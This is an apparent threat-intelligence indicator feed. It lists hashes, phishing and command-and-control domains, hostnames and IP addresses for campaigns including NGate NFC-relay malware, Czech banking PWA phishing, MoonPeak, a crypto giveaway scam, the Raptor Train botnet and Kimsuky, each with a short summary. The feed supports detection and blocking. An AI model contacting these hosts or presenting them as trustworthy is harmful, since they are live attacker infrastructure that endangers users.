| FileHash-MD5 | 93e4313edc3e70c4e50c418f1f44be80 |
| FileHash-MD5 | 952af76aea0773021cfb1932245a3711 |
| FileHash-MD5 | 99eee5c0856271604905dfc66fc03fca |
| FileHash-MD5 | 9aa6f175b7520878ecffe98444c1b336 |
| FileHash-MD5 | 9f2e8bcc93740b9fc8122ad7abcc43c9 |
| FileHash-MD5 | a57e009fdee84765642e655e4802c288 |
| FileHash-MD5 | a9036e8521431d6f6d50ea31ccdee96d |
| FileHash-MD5 | a95315ca7af6d857379adb2c87f27c72 |
| FileHash-MD5 | af869a4ab0bf10e528b0190a721cd7fc |
| FileHash-MD5 | b0cc816ac58ef4e309aab3362dc6b8ab |
| FileHash-MD5 | b1109bd86eeed5b4badd2eaf099c65f9 |
| FileHash-MD5 | b3f067b4dfea589351b3f5f25dfb1b3c |
| FileHash-MD5 | b4b85702d206534735f85b783123dc1a |
| FileHash-MD5 | ba1c2891d626401c5e1eb5b677ef2804 |
| FileHash-MD5 | bb2d3c26762eaa3b9c0bc1915dfe8ca0 |
| FileHash-MD5 | cb8e75a3d907ad22eec1bacafce09265 |
| FileHash-MD5 | d5b765f43eb431f3a4b8e49905282843 |
| FileHash-MD5 | eaff7697d0bc139cd3f2c2527522982e |
| FileHash-MD5 | ed9c745a566fc35e7f24e6b70bbb57cf |
| FileHash-MD5 | f1ae4692dfd5977fdec487bf55119008 |
| FileHash-SHA1 | 00a890a7a862864dfba02fc14c4a154c7ebb3534 |
| FileHash-SHA1 | 01b4ccd93e342d41c5ab357bf09472e84e256762 |
| FileHash-SHA1 | 02c4b864b6263f9124ff4c38ad81f77d85785407 |
| FileHash-SHA1 | 0694c99741258c9609771c544a647f6641caa138 |
| FileHash-SHA1 | 0a97cbb917e9e42b369d702724549ccc3a906e81 |
| FileHash-SHA1 | 0f924de937516916f5c6f64ff0548190338e264b |
| FileHash-SHA1 | 0fc8c1e2c08fd3dc83ceb72a4848c9aab66b7d57 |
| FileHash-SHA1 | 11b00c50bdafd9d9a2effcd4e51655689afb0b84 |
| FileHash-SHA1 | 19827b4c35bbc0e91d5c7b16b873e783139dcc11 |
| FileHash-SHA1 | 22e40aac894a8218aae2f1b5eeb79473922eb97c |
| FileHash-SHA1 | 2acbf2241c6f78b0d98623d40fa40e90cb952051 |
| FileHash-SHA1 | 2c4df83e48e7bc6d6141d5c5834d7fcc48d02272 |
| FileHash-SHA1 | 2e83754306f1bc776d0ca3aa3d67de16c087a799 |
| FileHash-SHA1 | 2fbd5167aa0194bbb8bcc4d039abd847c30b12ce |
| FileHash-SHA1 | 3c83cf0aec9a83bbb2cf9eba15f371be7fcdb6f6 |
| FileHash-SHA1 | 4982a6e134a829373ac75c988b8f1717bb0782ef |
| FileHash-SHA1 | 4a541fdc55f63fbd24474587920d161af0adcf8f |
| FileHash-SHA1 | 4baaf217d259f90e9edf23e345551e6e875869a5 |
| FileHash-SHA1 | 5469926232601e434617b7f0dce3fc22c9069a3b |
| FileHash-SHA1 | 57b3a92819027caf9872d1e4ea854686510dc89b |
| FileHash-SHA1 | 59e34e322dec70427df161636527eddaff09672c |
| FileHash-SHA1 | 5b002f7ce5d7b12fb72c60a8be998aeada8310aa |
| FileHash-SHA1 | 5e524201f30399d334f6149cd61092e08901abda |
| FileHash-SHA1 | 646ad65834a3190d930ba59fd9adbd3bf7934c49 |
| FileHash-SHA1 | 67deca3fe3025a3b384240aa76c8c986818b21ea |
| FileHash-SHA1 | 716043927b6935f35beaffe9c0395a4141459f24 |
| FileHash-SHA1 | 8698e712dc3ae9b2554f421d14e2d77323f0896a |
| FileHash-SHA1 | 87f852299fcbc26dcbd2b13863a8a6b95a7eb887 |
| FileHash-SHA1 | 8b0d446fdaee497e107d35a2d04872dd9e6a9370 |
| FileHash-SHA1 | 8cf89e59bb4d4723f86bee09a087cab95466a473 |
| FileHash-SHA1 | 91a0c054c037eb178a26b240a0d4d235a81b638c |
| FileHash-SHA1 | 9217ec6747a7d023fc46c0cf5c6d3918941fb65f |
| FileHash-SHA1 | 9925de249b29f1aeae1b99c88d5d25c878a3805b |
| FileHash-SHA1 | 9d63128e79362c0efc2bd3c35f918e4e1dfb16d3 |
| FileHash-SHA1 | a1967b428d4473e191ac391f5c2d7c54a906e97b |
| FileHash-SHA1 | a5cd2dd1be880362a2b376e80981aa5caf69aa7b |
| FileHash-SHA1 | bc03f1ba99cfb61c5b09b8925fc2f7a0e9e12470 |
| FileHash-SHA1 | be2c6aeb07af97d32f2b9ae6e990e4300ca09dcb |
| FileHash-SHA1 | c5cd9ac3cb56b8693e53ce1afb09206894e407ff |
| FileHash-SHA1 | cbc9b927ba0569b4cd3d6cf346ccc0e535772a43 |
| FileHash-SHA1 | d09f74e066c00e30aed773f9355c7909c7a471b8 |
| FileHash-SHA1 | d4c95dd98a02e7b96c665d53de27d6c4267300e5 |
| FileHash-SHA1 | db1b313a2f6d11a651fc941c46b2d02a9b2856ff |
| FileHash-SHA1 | db597d71ee15b475a396994ba28f4321564b5c3c |
| FileHash-SHA1 | dee29fb458a62b82e63a8f1cc570b4b2136faa1c |
| FileHash-SHA1 | e646d6084d89e2d9e4c62afd38df3860575388e1 |
| FileHash-SHA1 | e8575ac8924c6600e3ad00fc93f557ae63d542a8 |
| FileHash-SHA1 | f4b1595a066993ff06c849bc0faedde263c8b4cf |
| FileHash-SHA1 | feaab9df3ccd453b31bf84e2f2d7de6cf694a84e |
| FileHash-SHA256 | 01b0e9cb7e864e753261b94e3e652254968d8188562a5abfc240d19fa783bc5f |
| FileHash-SHA256 | 0280536885bb406bc8cd90631bb48ddd809dcf16ecfb5acdc2e75c40171a63af |
| FileHash-SHA256 | 11470b5107f563c19ab92929a0e0ee5cf1b0c95fdd146f69ff9f9d4123f908cb |
| FileHash-SHA256 | 136efade44da726858480a9b56aab5a9509e7c04b71fec08e9b779c069632d8c |
| FileHash-SHA256 | 13b904ed2391fed303979b8b8fe0ac72a356cab091057600237fc8ac784db82a |
| FileHash-SHA256 | 1487cfbb6d702b8b2cfa88a6d586c092cdfbb472274ff54f894df35edd2f9d3e |
| FileHash-SHA256 | 19e74d9f5649e9180b2b32b95c654e7fe448d989a44c15c9b3c245fa3150df5a |
| FileHash-SHA256 | 1a3e682c924edc1dc0a525f7f1c3e2534cb2945dfaf5bad52089592d216c6c7b |
| FileHash-SHA256 | 22046aaef8a6439d1f5f2980b4d6282e7b69e98c95a0f52010d8953f0cb5e736 |
| FileHash-SHA256 | 22988cbb286f387036ced6fca6bb72b9f5e326706ad99065bc04bb8cb5dc4a12 |
| FileHash-SHA256 | 230f3d74004fee235055e786aba413abff2ed5cf4faa1987a070493be28c75d1 |
| FileHash-SHA256 | 24a58d1168d02009c97095e75387765e63b320a0dde1f8a9a7c8e3689a3f6dfb |
| FileHash-SHA256 | 28323f93a6657363a0637341358303485d2cf240995457fc8393fb6b74f10d30 |
| FileHash-SHA256 | 29e642ef6bd41f343f66210e924724bb343432affd1ed25bf386d638ae79ee87 |
| FileHash-SHA256 | 2a1118c91d97a34e06344191eff546c062f81ccf58a7fa7bf1ec206a42d36c2b |
| FileHash-SHA256 | 2a5d05a6bfb3a73a91d88c15384c9b384d9309e8db0ed4e348d1a85d0f6729db |
| FileHash-SHA256 | 2d5e80f752608faa23f05e6558a695fcac261d78b9979d6746dc11dc995665e3 |
| FileHash-SHA256 | 376ff4dbea2e3570a5cb98a8b335c0503d050fecd7bb4f65d252b1b596d14fc7 |
| FileHash-SHA256 | 40df5d874ed86aa65454d3d7becc334b7ca2dcb11754f9131135071a98752691 |
| FileHash-SHA256 | 41b61acc644add0a40ec6dbda231ae41f9de478fbf8cc029bc89d95a2829a53e |
| FileHash-SHA256 | 447c387fca23aea2b0b78f1cf9ee1c369078196fe3c3051bb99309268d4a9f79 |
| FileHash-SHA256 | 472feeabc60fdcc87345574586a7599ead1625c94bf75f373e9086b4a6cfedbe |
| FileHash-SHA256 | 4b43f7145eebe4c07d208911b9d74c7c996a5037a04d52e4c38a80c2456d1187 |
| FileHash-SHA256 | 4daf21a708afc06c0da4ee6e192a6db6405efb1e3a9eb6905cc69d501e781c8b |
| FileHash-SHA256 | 5bc6f1986a6e794e8feb78c763fef5f8cbb59f3696daa468aba058fb79befbf0 |
| FileHash-SHA256 | 6b15d8508e6782c25dc48618bbbe9b53c8c9a822655a8e52b7370e034fae7564 |
| FileHash-SHA256 | 6bc1ac4f844a6940c9e083c32bbf3f469b1322cc5aa83e12ab1a7f35cdb51c23 |
| FileHash-SHA256 | 6da8e49d8e083ec705985effa03cdb60cdd736f04ed711211b2a3842c815a708 |
| FileHash-SHA256 | 731a58248c7b467bc9d9a7482d8cb010242b3a534904ddc39471fa0620752d22 |
| FileHash-SHA256 | 767e4c42cefc4a29921f612f14611cf56b7d950ba91ccdd3a59adb57f25b7d18 |
| FileHash-SHA256 | 790b166081fd763cc6239881a78ba5c4d757b8f98d1b5d5f7abfdede76f54c05 |
| FileHash-SHA256 | 7a165645df48f6bde0fd5939a3e15d160826d944e603c34d46a7285f02f0941e |
| FileHash-SHA256 | 7b3262b6c3ad52e50e2ec6faf1ffb12ca08f0d17ac4f90420f13a6053b7f9622 |
| FileHash-SHA256 | 7fa3d58a0056e8492a84894a6fd3b3d0d87ff1f9656f5e54b10580b9a4a4fd6a |
| FileHash-SHA256 | 7ffbc88e97be67214ad17325142ceb54823a5bdcebdbd4e4c9d0c65b3f0a1813 |
| FileHash-SHA256 | 85901707c7d058269820671e10af027eeadd39ee15f079cff340eed0f0ac9c2e |
| FileHash-SHA256 | 868ce8fa932c46b6de18455dfc0935a75029cc10c7b484bc358cdfabf0b0c533 |
| FileHash-SHA256 | 878bb68727daf025c0c9619d1d12337c289489f1190410ca4025c47f39357aa5 |
| FileHash-SHA256 | 8a2f6ff8aa1a6b416cb0aaa1530a8178c53760a69ce5c14d1d16ee880c335a4f |
| FileHash-SHA256 | 8b05684a73f44ed82c0faf424b2d41a0c7b00c2fef4d7dc232c5433739a59f6c |
| FileHash-SHA256 | 8bbb6cd5277177beb86b037ef77d6fcbae4a51a19668063d4d1b40ce2453dad3 |
| FileHash-SHA256 | 91fda73902e1a2a76b999df11caa4532c9c440d6f3da63dc03e0a78109d7583a |
| FileHash-SHA256 | 9762eba15b893609b9461125c5adbcaf3bac7fea9536ffca72566abfa1bed084 |
| FileHash-SHA256 | 9830b91dfcf987a2556afd85893f8569c6ba03e3ebb194ecb6b32dafbc22e1e1 |
| FileHash-SHA256 | 989cf5faf307304f86db03180978ba4bd93c909bb458db83fcebe4fb48d7a002 |
| FileHash-SHA256 | 9b204f839aed79d4c27f8d28198ef596dec9848a27a51f0672743a91e618677c |
| FileHash-SHA256 | 9c136701362e2d661805257c02e23c9aa01b9081e1a559571f947390522fc51b |
| FileHash-SHA256 | 9f693923e5641c046bdcadf10b4e2b553d078b98afc2e30f2d72660b1e0161ed |
| FileHash-SHA256 | a1a1fbdb6070ff388642974b1616d1955c2a89fbb8702caa02fa6927adbdad6c |
FileHash-SHA256 |
a46537ccf4a188091f973a47b7186ee805539a0e5d94c62867cec08cec1c33e6 |
FileHash-SHA256 |
a8cc088426c6406f03ccedbb854e8dc83543d38c98a405db15074e9531731ade |
FileHash-SHA256 |
ab85b62cad1a4009bf99c621b4950ee23c413b5c424952f225497bca7a318a99 |
FileHash-SHA256 |
ad1182d8bf3b1976e09f45b91085167559bc24e8f5e3f7315f96f344532cbcf8 |
FileHash-SHA256 |
afa3c43141a5b6f2473d49cdfa0bce1bf0af235a40f3ec092299287291137841 |
FileHash-SHA256 |
b009ad0ed336f1e4bff3f452e238b3ea83d3bc7773f52d16d057298c116a95ea |
FileHash-SHA256 |
b1b6a2d91e6fcc07322edce92aa75c13763b6844b2a1a549eeaf0f536bdc6183 |
FileHash-SHA256 |
b217e4f8143a6fbbad2e0667ce8242fc207274a78ce464af9b122df8ba12690b |
FileHash-SHA256 |
b4379324c7dc1fc623bcd9d2e8099dc3588ac23f87f33151d1c1005a1f33e713 |
FileHash-SHA256 |
b5c206d8f980c8fa12a29886fad49f6a1469264055740cdf763efa7f726cd8d7 |
FileHash-SHA256 |
b99fc0a9eea993d6b5a04b0a0b05fe103f164fb85281fcddb04ac686daee065f |
FileHash-SHA256 |
bcae6ea26fe1dd1fa5652e05c1b888186307ad277ce238a255908061b837a484 |
FileHash-SHA256 |
bff6fb5cbb1c0f8d05e2c6acefcf499a9c22f10d7db8aeda994638bf75018fbf |
FileHash-SHA256 |
c32eb3b850a20e4715a6db40635de9fc6cefad840ce7e64e9c68c2b3e378ee7e |
FileHash-SHA256 |
c8c73080a2eb18ad1434ac408e916f3f819637550dfe07f20ad79e66ec1b2cf9 |
FileHash-SHA256 |
cad56908abd1508451a5af4a5304de092f0342ec6a24bbbeb9b3988683483c84 |
FileHash-SHA256 |
d23ef9fe27b116d982f8ebafb99587ffc9cc6c9b932f1b2d5efab2dad156e65e |
FileHash-SHA256 |
d852f48e1c8a37d11f9dfb90f339316a5a3fa012bf152db43de1e81b45a69ba7 |
FileHash-SHA256 |
d887be78f443fabeb348ac2f85e1d42ed4d1c2cfc87d9e314c4b812c0b1fcfd8 |
FileHash-SHA256 |
de242d9428a378a1b0dacb2e8d481fdfb062a47450f815c13e105975d5a41663 |
FileHash-SHA256 |
e097bb08da761ae5780e6c600c79738e36285a59589098dde53c88611c1ac66a |
FileHash-SHA256 |
e328dde9fa6db3da195e813696973657cc4fe636601cb0061a75c5086b04aa95 |
FileHash-SHA256 |
e3875e3b20be42f38f457cf0b0d85683535472b47535635ec42da52b73b27e6e |
FileHash-SHA256 |
e57565bd3f398508321470f857dfb07c195ed9b7b494ba00dc7c407ac8b8f3e1 |
FileHash-SHA256 |
e82b0023abcc4bdb549f319389620c4cbd8ffabe8648168db31db62fd84a6904 |
FileHash-SHA256 |
eb1f89b2edaeda18023a6ea5cd7a4b2997e4839e1f3d57e54c5b7a1b64407874 |
FileHash-SHA256 |
eb779ec4ed2c85e114a18db89b8ef9c7a19adc907748d1f18076e167f79bf04b |
FileHash-SHA256 |
f6975b1a9ab8935d45d6c2d94540b67b2374827734593c126785924afffb6634 |
FileHash-SHA256 |
f703f31f7b9ef95f820a724ebcee36377e2f4a42c92756b819bea6f34ec96cac |
FileHash-SHA256 |
f91fd4f9b6594446144ba865356fde07669ea0b46a62ddd926bb8cac0aa04dc9 |
domain |
clienti-dati.com |
domain |
clienti-verifica.com |
domain |
datos-cliente.com |
domain |
descarga-app-sign.com |
domain |
descargar-e-instalar.com |
domain |
enlace-cliente.com |
domain |
entrar-y-confirmar.com |
domain |
generali-verifica.com |
domain |
installa-app.com |
domain |
la-mia-app.com |
domain |
la-nuova-app.cc |
domain |
scarica-app-token.com |
domain |
scarica-app.icu |
domain |
scarica-app.site |
|
NGate Android malware relays NFC traffic to steal cash |
ESET researchers uncovered a crimeware campaign targeting bank customers in Czechia. The NGate Android malware can relay NFC data from victims' payment cards to attackers' devices, enabling unauthorized ATM withdrawals. It's the first time this capability has been observed in the wild. The campaign evolved from using phishing PWAs and WebAPKs to deploying NGate, which tricks victims into providing banking details and NFC card data. |
Type |
Indicator |
FileHash-SHA1 |
0c799950ec157bb775637fb3a033a502f211e62e |
domain |
raiffeisen-cz.eu |
hostname |
app.mobil-csob-cz.eu |
hostname |
csob-93ef49e7a.tbc-app.life |
hostname |
geo-4bfa49b2.tbc-app.life |
hostname |
george.tbc-app.life |
hostname |
nfc.cryptomaker.info |
hostname |
rb-62d3a.tbc-app.life |
hostname |
rb.2f1c0b7d.tbc-app.life |
hostname |
rb.system.com |
|
Be careful what you wish for – Phishing in PWA applications |
ESET analysts dissected a novel phishing method tailored to Android and iOS users, combining standard phishing delivery techniques with an approach that targets mobile users via Progressive Web Applications (PWAs) and WebAPKs. Insidiously, installing these phishing PWAs and WebAPKs does not trigger the warnings normally shown when a third-party application is installed. Most of the observed applications targeted clients of Czech banks, but some also targeted banks in Hungary and Georgia. Two different threat actors were determined to be operating the campaigns based on their distinct command-and-control infrastructures. |
Type |
Indicator |
domain |
blackrockapp.eu |
domain |
cyrptomaker.info |
domain |
hide-me.online |
domain |
play-protect.pro |
hostname |
csas.georgecz.online |
FileHash-SHA1 |
d3d5ae6b8ae9c7c1f8690452760745e18640150d |
FileHash-SHA1 |
66f97405a1538a74cee4209e59a1e22192bc6c08 |
|
MoonPeak malware unveils new details on attacker infrastructure |
Cisco Talos has uncovered a campaign employing a new malware family called 'MoonPeak,' a remote access trojan actively developed by a North Korean advanced persistent threat group tracked as 'UAT-5394.' The analysis reveals the evolution of MoonPeak from an open-source malware called XenoRAT, with the threat actors introducing modifications to evade detection and analysis. Talos mapped the infrastructure used in this campaign, including command and control servers, payload hosting sites, and virtual machines for testing implants, unveiling the tactics, techniques, and procedures employed by UAT-5394. |
Type |
Indicator |
FileHash-MD5 |
535f59bc95fe3efc22abf5036c60ade0 |
FileHash-MD5 |
571c577595223518fd5a3ee8b36928d7 |
FileHash-MD5 |
60e8ed6c37e1fe9742a49916e07002e5 |
FileHash-MD5 |
9924b24434e2d92d0fc3b683006cbad1 |
FileHash-MD5 |
a470afe2f7176694553158bcd3decb53 |
FileHash-MD5 |
ca005ebe9454f30c2cedd73080677f56 |
FileHash-MD5 |
d3dd07f2454b9c81d9d16e65d6f24000 |
FileHash-MD5 |
e8ab7a58f35cae486d61c94910faa4fa |
FileHash-MD5 |
ee1dca47840fbab6d8956ef97f352496 |
FileHash-MD5 |
fcbc07e56f496e836c29833b89a23fce |
FileHash-SHA1 |
0eb6b3fa6f054d46158133c89df5eb5b30a37dfb |
FileHash-SHA1 |
1f2fa02f4e71b27700888cee750d4681bd858b2a |
FileHash-SHA1 |
2092423079ac375a59cd3cb320ca6d21d6732ed6 |
FileHash-SHA1 |
2ab49cbc1f4518e3368712a960c49a3e24975351 |
FileHash-SHA1 |
3495faeddcc98fc770bb9b275314234c8aae8502 |
FileHash-SHA1 |
63e9a16b0f4e7d8b290b95aec4cf3773f6e001df |
FileHash-SHA1 |
7c837e382597a42244002062a6adf1f71417fbbe |
FileHash-SHA1 |
8c1249d410a42319aa24cb9bdc0ab2cf4bca4342 |
FileHash-SHA1 |
a896a8140562c9e93828320d2a198a6dc24a453e |
FileHash-SHA1 |
af1c0acd817a53e9ec1c8cd081cd3b112205e2ec |
FileHash-SHA256 |
0b8897103135d92b89a83093f00d1da845a1eae63da7b57f638bab48a779808e |
FileHash-SHA256 |
0ed643a30a82daacecfec946031143b962f693104bcb7087ec6bda09ade0f3cb |
FileHash-SHA256 |
148c69a7a1e06dc06e52db5c3f5895de6adc3d79498bc3ccc2cbd8fdf28b2070 |
FileHash-SHA256 |
15eee641978ac318dabc397d9c39fb4cb8e1a854883d8c2401f6f04845a79b4b |
FileHash-SHA256 |
1ad43ddfce147c1ec71b37011d522c11999a974811fead11fee6761ceb920b10 |
FileHash-SHA256 |
27202534cc03a398308475146f6710b790aa31361931d4fe1b495c31c3ed54f7 |
FileHash-SHA256 |
293b1a7e923be0f554ec44c87c0981c9b5cf0f20c3ad89d767f366afb0c1f24a |
FileHash-SHA256 |
2b35ef3080dcc13e2d907f681443f3fc3eda832ae66b0458ca5c97050f849306 |
FileHash-SHA256 |
3e39fc595db9db1706828b0791161440dc1571eaa07b523df9b721ad65e2369b |
FileHash-SHA256 |
4108c5096a62c0a6664eed781c39bb042eb0adf166fcc5d64d7c89139d525d4f |
FileHash-SHA256 |
41d4f7734fbf14ebcdf63f51093718fd5a22ec38a297c0dc3d7704a3fb48b3f9 |
FileHash-SHA256 |
44e492d5b9c48c1df7ef5e0fe9a732f271234219d8377cf909a431a386759555 |
FileHash-SHA256 |
458641936e2b41c425161a9b892d2aa08d1de2bc0db446f214b5f87a6a506432 |
FileHash-SHA256 |
4599a9421e83fb0e2c005e5d9ac171305192beabe965f3385accaf2647be3e8e |
FileHash-SHA256 |
58fdc1b6ce4744d6331f8e2efc4652d754e803cae4cc16101fc78438184995e6 |
FileHash-SHA256 |
6a3839788c0dafe591718a3fb6316d12ccd8e82dbcb41ce40e66b743f2dd344d |
FileHash-SHA256 |
6bf8a19deb443bde013678f3ff83ab9db4ddc47838cd9d00935888e00b30cee6 |
FileHash-SHA256 |
72a25d959d12e3efe9604aee4b1e7e4db1ef590848d207007419838ddbad5e3f |
FileHash-SHA256 |
8a4fbcdec5c08e6324e3142f8b8c41da5b8e714b9398c425c47189f17a51d07b |
FileHash-SHA256 |
97ba8d30cf8393c39f61f7e63266914ecafd07bd49911370afb866399446f37d |
FileHash-SHA256 |
a80a35649f638049244a06dd4fb6eca4de0757ef566bfbe1affe1c8bf1d96b04 |
FileHash-SHA256 |
b8233fe9e903ca08b9b1836fe6197e7d3e98e36b13815d8662de09832367a98a |
FileHash-SHA256 |
f4aa4c6942a87087530494cba770a1dcbc263514d874f12ba93a64b1edbae21c |
FileHash-SHA256 |
f928a0887cf3319a74c90c0bdf63b5f79710e9f9e2f769038ec9969fcc8ee329 |
FileHash-SHA256 |
facf3b40a2b99cc15eee7b7aee3b36a57f0951cda45931fcde311c0cc21cdc71 |
domain |
nmailhostserver.store |
domain |
nsonlines.store |
domain |
pumaria.store |
domain |
yoiroyse.store |
|
Russia-linked crypto threat actor involved in political spoofing tracked |
A Russia-linked threat actor is deploying domains for crypto scams targeting the US Presidential Election and prominent tech brands. The scams involve fake Bitcoin and Ethereum giveaways, asking users to send coins to attacker-controlled wallets with false promises of doubling returns. A large cluster of domains featuring US political figures, business leaders, and global brands has been discovered, using counterfeit legal letters from US agencies to add legitimacy. Targets include Donald Trump, Kamala Harris, Tim Cook, Elon Musk, and others. The campaign involves spoofed websites, CAPTCHA protection, and chat functions. Some domains feature Russian language content. The threat actor uses Cloudflare for hosting and has registered domains with a Russian email address. |
Type |
Indicator |
domain |
apple-event2024.com |
domain |
btcstarship.com |
domain |
cryptologic.online |
domain |
debate.gives |
domain |
trumpdebate24.com |
hostname |
musk.trump.io |
|
Derailing the Raptor Train |
A large, multi-tiered botnet called Raptor Train, likely operated by the Chinese state-sponsored threat actor Flax Typhoon, has been discovered. Consisting of over 60,000 compromised SOHO and IoT devices at its peak, it is one of the largest Chinese state-sponsored IoT botnets to date. The botnet uses a sophisticated control system called Sparrow to manage its infrastructure and execute various tasks. While no DDoS attacks have been observed, the botnet has targeted U.S. and Taiwanese entities in sectors like military, government, education, and telecommunications. The network architecture includes three tiers: compromised devices, exploitation and C2 servers, and management nodes. Campaigns have evolved over four years, showing increasing sophistication in tactics and scale. |
Type |
Indicator |
CVE |
CVE-2024-21887 |
IPv4 |
45.92.70.111 |
IPv4 |
45.92.70.112 |
IPv4 |
45.92.70.113 |
IPv4 |
45.92.70.115 |
IPv4 |
45.92.70.68 |
IPv4 |
45.92.70.71 |
IPv4 |
185.207.154.253 |
IPv4 |
23.236.68.161 |
IPv4 |
23.236.69.110 |
IPv4 |
23.236.69.82 |
IPv4 |
45.10.58.133 |
IPv4 |
45.13.199.104 |
IPv4 |
45.13.199.152 |
IPv4 |
45.13.199.45 |
IPv4 |
45.80.215.149 |
IPv4 |
5.188.33.228 |
IPv4 |
65.20.97.251 |
IPv4 |
85.90.216.110 |
IPv4 |
92.38.178.232 |
IPv4 |
92.38.185.45 |
FileHash-SHA256 |
2aa12e5989065951be84ce932b65bd197dd6be3fa987838bad48536c0c74d145 |
FileHash-SHA256 |
546390a3a296154e36051dda745b573658311f9831789bb1faca411a3803a9bb |
FileHash-SHA256 |
c6fe1748e68923f278926ee8679aaee22800b9c93c38641d12ea0e945e116bb0 |
IPv4 |
104.244.89.157 |
IPv4 |
114.255.70.20 |
IPv4 |
114.255.70.30 |
IPv4 |
139.180.137.219 |
IPv4 |
14.1.98.223 |
IPv4 |
149.248.51.22 |
IPv4 |
155.138.133.56 |
IPv4 |
155.138.151.225 |
IPv4 |
185.14.45.160 |
IPv4 |
195.234.62.18 |
IPv4 |
195.234.62.184 |
IPv4 |
195.234.62.188 |
IPv4 |
195.234.62.19 |
IPv4 |
195.234.62.192 |
IPv4 |
195.234.62.197 |
IPv4 |
195.234.62.198 |
IPv4 |
202.182.109.151 |
IPv4 |
207.148.122.69 |
IPv4 |
207.148.68.131 |
IPv4 |
210.61.186.117 |
IPv4 |
223.98.159.112 |
IPv4 |
23.236.68.193 |
IPv4 |
23.236.68.213 |
IPv4 |
23.236.68.229 |
IPv4 |
37.61.229.15 |
IPv4 |
37.61.229.17 |
IPv4 |
37.9.35.89 |
IPv4 |
45.10.58.128 |
IPv4 |
45.10.58.129 |
IPv4 |
45.10.58.130 |
IPv4 |
45.10.58.132 |
IPv4 |
45.13.199.140 |
IPv4 |
45.13.199.207 |
IPv4 |
45.13.199.84 |
IPv4 |
45.13.199.96 |
IPv4 |
45.135.117.131 |
IPv4 |
45.135.117.136 |
IPv4 |
45.77.231.209 |
IPv4 |
45.80.215.150 |
IPv4 |
45.80.215.151 |
IPv4 |
45.80.215.152 |
IPv4 |
45.80.215.154 |
IPv4 |
45.80.215.155 |
IPv4 |
45.80.215.156 |
IPv4 |
45.80.215.186 |
IPv4 |
45.80.215.47 |
IPv4 |
5.181.27.19 |
IPv4 |
5.181.27.21 |
IPv4 |
5.181.27.219 |
IPv4 |
5.181.27.6 |
IPv4 |
5.188.33.135 |
IPv4 |
5.45.184.68 |
IPv4 |
78.141.238.97 |
IPv4 |
85.90.216.111 |
IPv4 |
85.90.216.112 |
IPv4 |
85.90.216.115 |
IPv4 |
85.90.216.116 |
IPv4 |
85.90.216.69 |
IPv4 |
89.44.198.195 |
IPv4 |
89.44.198.200 |
IPv4 |
89.44.198.254 |
IPv4 |
91.216.190.154 |
IPv4 |
91.216.190.2 |
IPv4 |
91.216.190.247 |
IPv4 |
91.216.190.74 |
IPv4 |
91.216.190.80 |
IPv4 |
92.223.30.232 |
IPv4 |
92.223.30.233 |
IPv4 |
92.223.30.241 |
IPv4 |
92.38.135.146 |
IPv4 |
92.38.176.131 |
IPv4 |
92.38.176.156 |
IPv4 |
92.38.185.43 |
IPv4 |
92.38.185.44 |
IPv4 |
92.38.185.46 |
IPv4 |
92.38.185.47 |
domain |
adjsn.com |
domain |
amdord.com |
domain |
aqakffj.com |
domain |
bcdkwwuah.com |
domain |
bkhqwfhtu.com |
domain |
blepmhnay.com |
domain |
bxgtbv.com |
domain |
clqqknzb.com |
domain |
cvgeuwo.com |
domain |
cvmnomvxm.com |
domain |
dkuwbcen.com |
domain |
dvujvkfu.com |
domain |
ecvkiehs.com |
domain |
eufcj.com |
domain |
fajxtg.com |
domain |
ftcexq.com |
domain |
glxxet.com |
domain |
gmhrxhc.com |
domain |
grntjr.com |
domain |
hersrr.com |
domain |
hfsdln.com |
domain |
hy1025.com |
domain |
hy229.com |
domain |
hy30.com |
domain |
hy324.com |
domain |
hy42.com |
domain |
hy424.com |
domain |
hy529.com |
domain |
hy619.com |
domain |
hy811.com |
domain |
hy830.com |
domain |
hy92.com |
domain |
hyddh.com |
domain |
iycwqot.com |
domain |
jgnsqihc.com |
domain |
jkwxcc.com |
domain |
kmgzbowwg.com |
domain |
lfzupr.com |
domain |
lofeuq.com |
domain |
lomuzs.com |
domain |
lznmihdej.com |
domain |
mudvw.com |
domain |
mvxnspcqr.com |
domain |
nhcmdikkd.com |
domain |
nmfagp.com |
domain |
obqlibg.com |
domain |
oicdsgjxz.com |
domain |
omviak.com |
domain |
oploz.com |
domain |
osiso.com |
domain |
qjknpv.com |
domain |
qsxgzu.com |
domain |
rnjca.com |
domain |
saoadlg.com |
domain |
sbuybjv.com |
domain |
sreudcnb.com |
domain |
ttcyci.com |
domain |
tvcvhzyk.com |
domain |
ujrtkw.com |
domain |
vbbrfvhrg.com |
domain |
vgbgwzmr.com |
domain |
wndaoyk.com |
domain |
woaba.com |
domain |
wvsezu.com |
domain |
ykcmewapc.com |
domain |
ysubryfv.com |
domain |
zuszr.com |
hostname |
aewreiuicajo.w8510.com |
hostname |
apdfhhjcxcb.w8510.com |
hostname |
api.k3121.com |
hostname |
awbpxtpi.w8510.com |
hostname |
awerdasvbjgrt.b2047.com |
hostname |
awqx.k3121.com |
hostname |
axqw.k3121.com |
hostname |
ayln.b2047.com |
hostname |
bzbatflwb.w8510.com |
hostname |
firc.b2047.com |
hostname |
hnai.k3121.com |
hostname |
hume.b2047.com |
hostname |
hyjk.k3121.com |
hostname |
kliscjaisdjhi.w8510.com |
hostname |
kuyw.b2047.com |
hostname |
lfdx.k3121.com |
hostname |
lyblqwesfawe.w8510.com |
hostname |
mail.k3121.com |
hostname |
mjiudwajhkf.w8510.com |
hostname |
nulp.k3121.com |
hostname |
ocmnusdjdik.w8510.com |
hostname |
oklm.k3121.com |
hostname |
qwsd.k3121.com |
hostname |
tuisasdcxzd.w8510.com |
hostname |
voias.b2047.com |
hostname |
wmllxwkg.w8510.com |
hostname |
xaqw.k3121.com |
hostname |
xbqw.k3121.com |
hostname |
xxqw.b2047.com |
hostname |
zasdfgasd.w8510.com |
hostname |
zdacasdc.w8510.com |
hostname |
zdacxzd.w8510.com |
|
Kimsuky: A Gift That Keeps on Giving |
This analysis details a sophisticated cyber attack attributed to the North Korean-linked Kimsuky APT group. The attack begins with an LNK file that leads to the execution of obfuscated VBS scripts. These scripts create scheduled tasks, modify registry keys for persistence, and establish communication with a command and control (C2) server. The malware employs several evasion techniques, including Base64 encoding and Caesar cipher obfuscation. The ultimate goal appears to be maintaining long-term access to the victim's machine for espionage. The report also includes a personal anecdote: the analyst's brief interaction with the C2 server, which returned a single command after hours of waiting. |
Type |
Indicator |
FileHash-MD5 |
0c3fd7f45688d5ddb9f0107877ce2fbd |
FileHash-MD5 |
37fb639a295daa760c739bc21c553406 |
FileHash-MD5 |
4cbafb288263fe76f5e36f1f042be22d |
FileHash-MD5 |
